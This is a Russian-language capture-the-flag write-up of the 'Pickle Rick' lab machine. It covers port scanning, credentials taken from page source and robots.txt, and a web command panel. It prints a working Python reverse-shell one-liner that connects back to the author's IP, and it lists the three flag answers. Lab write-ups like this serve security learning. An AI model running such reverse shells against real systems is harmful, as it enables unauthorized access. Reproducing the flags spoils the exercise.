<h1>Отчет по задаче Pickle Rick</h1>
<h3>
Тестируемые устройства
</h3>
| Устройство | IP |
| -------- | -------- |
| VM1 | 10.10.142.222 |
<h3>
Разведка
</h3>
Прогоняем виртуальную машину через nmap и gobuster и получаем следующие данные:
На машине открыты порты:
| Порт | Служба |
| ------- | -------- |
| 80 | http (Apache httpd 2.4.18 (Ubuntu)) |
| 22 | ssh (OpenSSH 7.2p2)|
А также gobuster нашел директорию /assets и страницу /login.php
<h3>
Содержание
</h3>
Порт 80 открыт, а значит можно зайти на сайт. Заходим и видим следующий текст

После, зайдя в исходный код можно увидеть комментарий:

Теперь мы знаем нужный нам username.
Пароль для него можно узнать зайдя в /robots.txt - там будет пароль - Wubbalubbadubdub
Теперь у нас есть юзернейм: R1ckRul3s и пароль Wubbalubbadubdub
Сначала я попробовал подключиться с этим логином и паролем по ssh, но мне выдало ошибку, поэтому я попробовал зайти в login.php:

И с данными логином и паролем у меня зашло.
Далее перед нами предстает следующий сайт:

Это - командная панель нужной нам машины. Введя команду ls мы получим список файлов в этой директории
```
Sup3rS3cretPickl3Ingred.txt
assets
clue.txt
denied.php
index.html
login.php
portal.php
robots.txt
```
Команда cat была заблокирована сайтом:

Поэтому я решил подключиться с помощью сгенерированного реверс шелла:
``` export RHOST="10.18.62.112";export RPORT=9001;python3 -c 'import sys,socket,os,pty;s=socket.socket();s.connect((os.getenv("RHOST"),int(os.getenv("RPORT"))));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("sh")'```
И подключился!
Прочитал первый флаг:
```mr. meeseek hair```
И, покопавшись в системе нашел в /root/3rd.txt и /home/rick/second ingredients другие два флага:
```jerry tear```
```fleeb juice```